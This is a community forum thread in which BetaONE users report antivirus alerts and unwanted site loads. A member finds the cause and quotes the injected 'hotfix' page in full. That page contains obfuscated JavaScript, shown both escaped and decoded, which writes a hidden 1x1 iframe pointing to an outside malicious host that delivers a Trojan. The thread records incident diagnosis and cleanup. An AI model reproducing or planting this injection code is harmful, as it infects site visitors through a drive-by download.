B1 Infected !

[DoG]

I'm seeing this problem now on Firefox- will scan the server and see what's happening.

[Voodoo]

I am now also getting this from Nod32. I also notice a few other websites loading when I go to BetaOne.



Cheerz
Voodoo

[Voodoo]

BUMP

Can an admin look at this. As stated, a shitload of other sites are also loaded when you come here. Cant be good.

Cheerz
Dave

[DoG]

The server was scanned and cleaned earlier this week- afaik it's still clean but will check. Are you sure you havent been infected with spyware?

[freezer121]

I've just got precisely the same as Voodoo from my NOD32. I think I'm clean but I'll check. I had no indications of a problem before today and was following the thread out of interest only - then Bingo!

[Alpine]

i am clean on the 2 pcs i use to come over b1 ! Both are still giving me this virus !!

ill do another check on my pc right now !

[DoG]

I scanned the server last night with KAV and Trend House Call but all was clean......

[Cactus]

DoG,

Now don't tell me you really coudn't find this....

The first page when surfing to B1 is named "BetaONE Hotfix" and has the following HTML code:

Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
  <title>BetaONE Hotfix</title>
</head>

<body><Script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
   <meta http-equiv="refresh" content="0; url=http://www.betaone.net/forum" />
</body>

</html>

The Javascript code (unescaped) is

Code:

<iframe src="http://mn96.dns.gendistr.info/qualitytest" width=1 height=1></iframe>'

That page (after some more site switching) eventualy leaves you infected with what Symantec call's Trojan.Exploit.131 (see http://securityresponse.symantec.com...033008-3019-99) after witch it loads the betaone.net/forum page as if all is well.

So sure, the server might not be infected, but the index.php contains code that will get you infected. Now don't tell me you didn't see this, i mean, come on

Oh, and I saw today is yout birthday. Congratulations! Have a beer on me!

Anyways,
Cheers,

Le Cactus

[DoG]

I removed the erroneus script when i realised that it never used to be part of the hotfix page- then i saw your post and felt much happier
Hows's it going Cactus? Thanks for the Birthday wishes

[Voodoo]

Quote:

Originally Posted by DoG

I removed the erroneus script when i realised that it never used to be part of the hotfix page-

Hi there Mike. All the other sites are still loading on my side? Tried Firefox as well as Opera.

Cheerz
Dave